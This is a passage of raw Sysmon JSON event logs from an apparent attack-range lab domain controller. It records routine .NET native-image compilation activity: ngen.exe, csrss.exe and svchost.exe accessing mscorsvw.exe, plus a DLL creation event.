4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:46.152","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-001006930D00}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7172,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:46.152\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-001006930D00}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:46.152","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-001006930D00}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7173,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:46.152\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-001006930D00}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:46.152","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-001006930D00}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7174,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:46.215\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0496-5F25-0000-0010302F0F00}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:46.215","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0496-5F25-0000-0010302F0F00}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7175,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:46.215\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0496-5F25-0000-0010302F0F00}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:46.215","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0496-5F25-0000-0010302F0F00}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7176,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:46.215\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0496-5F25-0000-0010302F0F00}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:46.215","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0496-5F25-0000-0010302F0F00}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7177,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:46.668\r\nProcessGuid: {A837DB8D-0496-5F25-0000-0010302F0F00}\r\nProcessId: 4560\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11d0-0\\PresentationFramework.Aero.dll\r\nCreationUtcTime: 2020-08-01 05:58:46.668","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:46.668","ProcessGuid":"{A837DB8D-0496-5F25-0000-0010302F0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11d0-0\\PresentationFramework.Aero.dll","CreationUtcTime":"2020-08-01 05:58:46.668","EventReceivedTime":"2020-08-01 05:58:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7178,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:46.699\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0496-5F25-0000-001052340F00}\r\nTargetProcessId: 4980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:46.699","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0496-5F25-0000-001052340F00}","TargetProcessId":"4980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7179,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:46.699\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0496-5F25-0000-001052340F00}\r\nTargetProcessId: 4980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:46.699","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0496-5F25-0000-001052340F00}","TargetProcessId":"4980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7180,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:46.715\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0496-5F25-0000-001052340F00}\r\nTargetProcessId: 4980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 